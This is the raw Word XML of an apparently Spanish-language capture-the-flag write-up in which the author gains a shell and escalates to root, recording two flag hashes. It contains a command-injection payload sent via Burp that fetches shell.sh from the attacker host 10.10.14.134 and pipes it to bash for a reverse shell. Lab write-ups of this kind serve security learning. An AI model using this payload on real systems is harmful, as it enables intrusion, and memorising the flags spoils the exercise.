    <w:p w14:paraId="1E5AB27F" w14:textId="77777777" w:rsidR="00310363" w:rsidRDefault="00310363" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="6F2C3605" w14:textId="77777777" w:rsidR="006134FE" w:rsidRDefault="00416667" w:rsidP="00AC6E28">
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="004C0991">
        <w:t xml:space="preserve">a acá podemos mandar peticiones, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E695D" w14:textId="06615B58" w:rsidR="001359F9" w:rsidRDefault="006134FE" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">creamos un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y luego </w:t>
      </w:r>
      <w:r w:rsidR="004C0991">
        <w:t>ponemos a escuchar el puerto 1234 de nuevo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8E937" w14:textId="760A63F9" w:rsidR="004C0991" w:rsidRDefault="004C0991" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="004C0991">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AA49B0" wp14:editId="405D261D">
            <wp:extent cx="5612130" cy="177673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D1F4" w14:textId="16EBD844" w:rsidR="000245F1" w:rsidRDefault="005043A8" w:rsidP="00AC6E28">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y mandamos esto</w:t>
      </w:r>
      <w:r w:rsidR="00EE3ABA">
        <w:t xml:space="preserve"> por el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE3ABA">
        <w:t>burs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE3ABA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005043A8">
        <w:t>date=2023-09-15;curl=http%3a//10.10.14.134/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005043A8">
        <w:t>shell.sh|bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1660C88D" w14:textId="5BA52AA5" w:rsidR="00C34B7A" w:rsidRDefault="007F1100" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="007F1100">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A61E3A4" wp14:editId="770EE143">
            <wp:extent cx="5612130" cy="4399280"/>
            <wp:effectExtent l="0" t="0" r="762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572D" w14:textId="5B700DCF" w:rsidR="000245F1" w:rsidRDefault="000245F1" w:rsidP="00AC6E28">
      <w:r>
        <w:t>Acá observamos que podemos hacer consultas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A65C9" w14:textId="08E77237" w:rsidR="000245F1" w:rsidRDefault="000245F1" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="000245F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32154F78" wp14:editId="182C510D">
            <wp:extent cx="5612130" cy="254254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C81C" w14:textId="77777777" w:rsidR="00B92EAA" w:rsidRDefault="00B92EAA" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="5CE7C22D" w14:textId="77777777" w:rsidR="00B92EAA" w:rsidRDefault="00B92EAA" w:rsidP="00B92EAA">
      <w:r>
        <w:t xml:space="preserve">Y entramos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF1DD2" w14:textId="77777777" w:rsidR="00B92EAA" w:rsidRDefault="00B92EAA" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="2292C90B" w14:textId="7437716D" w:rsidR="00B92EAA" w:rsidRDefault="00B92EAA" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00D2659B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E0758EA" wp14:editId="0D066CC9">
            <wp:extent cx="5612130" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="762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ECAD" w14:textId="77777777" w:rsidR="00633752" w:rsidRDefault="00633752" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="515689CE" w14:textId="201568C8" w:rsidR="00633752" w:rsidRDefault="00633752" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Ahora hay que buscar el </w:t>
      </w:r>
      <w:r w:rsidR="00837462">
        <w:t xml:space="preserve">archivo o bandera del usuario </w:t>
      </w:r>
      <w:r w:rsidR="00ED3C30">
        <w:t>base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE64AC" w14:textId="04D3F515" w:rsidR="00837462" w:rsidRDefault="00ED3C30" w:rsidP="00ED3C30">
      <w:r w:rsidRPr="00ED3C30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526DD276" wp14:editId="5A2FDCAC">
            <wp:extent cx="4877481" cy="2238687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D45D" w14:textId="77777777" w:rsidR="002F4956" w:rsidRDefault="002F4956" w:rsidP="00837462">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016D91B7" w14:textId="3D6AB697" w:rsidR="002F4956" w:rsidRDefault="002F4956" w:rsidP="00ED3C30">
      <w:r>
        <w:t xml:space="preserve">Primera bandera: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F4956">
        <w:t>e7c591fcb9fd1fcbeca22190e72510ca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C7962" w14:textId="77777777" w:rsidR="00EE6E0F" w:rsidRDefault="00EE6E0F" w:rsidP="00772039"/>
    <w:p w14:paraId="474EDEA8" w14:textId="207897EF" w:rsidR="00FC1AC8" w:rsidRDefault="00EE6E0F" w:rsidP="00772039">
      <w:r>
        <w:t xml:space="preserve">Acá empezábamos a escalar privilegios para poder ingresar al usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43BF59D5" w14:textId="16A616D5" w:rsidR="00772039" w:rsidRDefault="00EE6E0F" w:rsidP="00ED3C30">
      <w:r w:rsidRPr="00EE6E0F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC6B487" wp14:editId="039006C0">
            <wp:extent cx="5612130" cy="5066030"/>
            <wp:effectExtent l="0" t="0" r="762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A259" w14:textId="35E32F72" w:rsidR="005F0103" w:rsidRDefault="005F0103" w:rsidP="00ED3C30">
      <w:r w:rsidRPr="005F0103">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679FE734" wp14:editId="42AE988F">
            <wp:extent cx="5612130" cy="1762760"/>
            <wp:effectExtent l="0" t="0" r="762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423F" w14:textId="34EEB414" w:rsidR="00F14B1B" w:rsidRDefault="00F14B1B" w:rsidP="00ED3C30">
      <w:r>
        <w:t xml:space="preserve">Por fin accedimos al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00800C3C">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00800C3C">
        <w:t xml:space="preserve"> y leemos el archivo root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183BF8E3" w14:textId="77777777" w:rsidR="00F14B1B" w:rsidRDefault="00F14B1B" w:rsidP="00F14B1B">
      <w:r>
        <w:t xml:space="preserve">Segunda bandera: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD21F9">
        <w:t>3c8ff279719f7a2b33a27455211426ad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D8ECB" w14:textId="77777777" w:rsidR="00F14B1B" w:rsidRDefault="00F14B1B" w:rsidP="00ED3C30"/>
    <w:p w14:paraId="33590C4D" w14:textId="1FEA056E" w:rsidR="00581D82" w:rsidRDefault="00581D82" w:rsidP="00581D82">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1401E5ED" w14:textId="6402043D" w:rsidR="00752282" w:rsidRDefault="00752282" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="27DE8426" w14:textId="77777777" w:rsidR="002E72C6" w:rsidRDefault="002E72C6" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="408E670E" w14:textId="77777777" w:rsidR="00354835" w:rsidRDefault="00354835" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="32146917" w14:textId="191854BC" w:rsidR="00354835" w:rsidRDefault="00354835" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="54106B80" w14:textId="77777777" w:rsidR="00B43F20" w:rsidRDefault="00B43F20" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="2BB5E771" w14:textId="0F420807" w:rsidR="00B43F20" w:rsidRDefault="00B43F20" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="7C7CB22A" w14:textId="77777777" w:rsidR="009D758D" w:rsidRDefault="009D758D" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="56CBE679" w14:textId="733AA0E6" w:rsidR="009D758D" w:rsidRDefault="009D758D" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="5BFE3C70" w14:textId="77777777" w:rsidR="00DB763D" w:rsidRDefault="00DB763D" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="43616D54" w14:textId="2F75D21A" w:rsidR="00DB763D" w:rsidRDefault="00426981" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00426981">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560A0A68" wp14:editId="714EE0D4">
            <wp:extent cx="5612130" cy="234569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763D">
      <w:headerReference w:type="default" r:id="rId2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130CA3" w14:textId="77777777" w:rsidR="00FD1531" w:rsidRDefault="00FD1531" w:rsidP="00C121FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="72752511" w14:textId="77777777" w:rsidR="00FD1531" w:rsidRDefault="00FD1531" w:rsidP="00C121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39EFA3" w14:textId="77777777" w:rsidR="00FD1531" w:rsidRDefault="00FD1531" w:rsidP="00C121FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="741F07BF" w14:textId="77777777" w:rsidR="00FD1531" w:rsidRDefault="00FD1531" w:rsidP="00C121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62A391" w14:textId="6715506B" w:rsidR="00C121FA" w:rsidRDefault="00A641B1">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37BAFF73" wp14:editId="3D6CF894">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5273040</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-236855</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1181100" cy="586740"/>
          <wp:effectExtent l="0" t="0" r="0" b="3810"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="30" name="Imagen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1100" cy="58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121FA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9B1687"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5ACE27AE"/>
    <w:lvl w:ilvl="0" w:tplc="90FA5B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DF7E40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77D6F1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1FA"/>
    <w:rsid w:val="00013587"/>
    <w:rsid w:val="000245F1"/>
    <w:rsid w:val="0003555E"/>
    <w:rsid w:val="00070DAA"/>
    <w:rsid w:val="00125FCB"/>
    <w:rsid w:val="00130770"/>
    <w:rsid w:val="001359F9"/>
    <w:rsid w:val="0015440C"/>
    <w:rsid w:val="001B5438"/>
    <w:rsid w:val="001E43B5"/>
    <w:rsid w:val="002B153E"/>
    <w:rsid w:val="002E72C6"/>
    <w:rsid w:val="002F4956"/>
    <w:rsid w:val="00310363"/>
    <w:rsid w:val="003267B7"/>
    <w:rsid w:val="00354835"/>
    <w:rsid w:val="003622F6"/>
    <w:rsid w:val="00381458"/>
    <w:rsid w:val="003C12BE"/>
    <w:rsid w:val="003E2398"/>
    <w:rsid w:val="003F0749"/>
    <w:rsid w:val="00416667"/>
    <w:rsid w:val="00417AC9"/>
    <w:rsid w:val="00426981"/>
    <w:rsid w:val="00485B1B"/>
    <w:rsid w:val="00491DCF"/>
    <w:rsid w:val="004A64C5"/>
    <w:rsid w:val="004C0991"/>
    <w:rsid w:val="004C3D6F"/>
    <w:rsid w:val="004C4AE6"/>
    <w:rsid w:val="005043A8"/>
    <w:rsid w:val="005158A2"/>
    <w:rsid w:val="005662F0"/>
    <w:rsid w:val="00581D82"/>
    <w:rsid w:val="005D7BF8"/>
    <w:rsid w:val="005F0103"/>
    <w:rsid w:val="005F619A"/>
    <w:rsid w:val="006134FE"/>
    <w:rsid w:val="00621DB1"/>
    <w:rsid w:val="00633752"/>
    <w:rsid w:val="00692F16"/>
    <w:rsid w:val="006B21DC"/>
    <w:rsid w:val="006B7188"/>
    <w:rsid w:val="0072438F"/>
    <w:rsid w:val="00752282"/>
    <w:rsid w:val="00766DA2"/>
    <w:rsid w:val="00772039"/>
    <w:rsid w:val="007D3AD0"/>
    <w:rsid w:val="007F1100"/>
    <w:rsid w:val="00800846"/>
    <w:rsid w:val="00800C3C"/>
    <w:rsid w:val="0081388D"/>
    <w:rsid w:val="0082038A"/>
    <w:rsid w:val="00837462"/>
    <w:rsid w:val="00837F15"/>
    <w:rsid w:val="008600D1"/>
    <w:rsid w:val="008A549D"/>
    <w:rsid w:val="008B3CF6"/>
    <w:rsid w:val="008F1624"/>
    <w:rsid w:val="008F1CC0"/>
    <w:rsid w:val="008F7AD2"/>
    <w:rsid w:val="00933F96"/>
    <w:rsid w:val="0097115E"/>
    <w:rsid w:val="00993072"/>
    <w:rsid w:val="0099725A"/>
    <w:rsid w:val="009974A0"/>
    <w:rsid w:val="009D758D"/>
    <w:rsid w:val="009E258D"/>
    <w:rsid w:val="00A25088"/>
    <w:rsid w:val="00A52BE0"/>
    <w:rsid w:val="00A641B1"/>
    <w:rsid w:val="00AB5241"/>
    <w:rsid w:val="00AC6E28"/>
    <w:rsid w:val="00AE0C29"/>
    <w:rsid w:val="00B2681D"/>
    <w:rsid w:val="00B4021E"/>
    <w:rsid w:val="00B43F20"/>
    <w:rsid w:val="00B537BD"/>
    <w:rsid w:val="00B92EAA"/>
    <w:rsid w:val="00C121FA"/>
    <w:rsid w:val="00C32036"/>
    <w:rsid w:val="00C34B7A"/>
    <w:rsid w:val="00CB332F"/>
    <w:rsid w:val="00D2393F"/>
    <w:rsid w:val="00D2659B"/>
    <w:rsid w:val="00D300C6"/>
    <w:rsid w:val="00D43D5F"/>
    <w:rsid w:val="00DB24AC"/>
    <w:rsid w:val="00DB763D"/>
    <w:rsid w:val="00DC3927"/>
    <w:rsid w:val="00ED3C30"/>
    <w:rsid w:val="00EE3ABA"/>
    <w:rsid w:val="00EE6E0F"/>
    <w:rsid w:val="00F14B1B"/>
    <w:rsid w:val="00FC1AC8"/>
    <w:rsid w:val="00FD1531"/>
    <w:rsid w:val="00FF3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FAFDF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F282C986-D135-4173-B008-E293D49E1E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121F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121FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C121F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121FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B537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11</Pages>
  <Words>395</Words>
  <Characters>2175</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>18</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2565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Camilo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>camilo peña marin</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-15T01:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-15T16:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>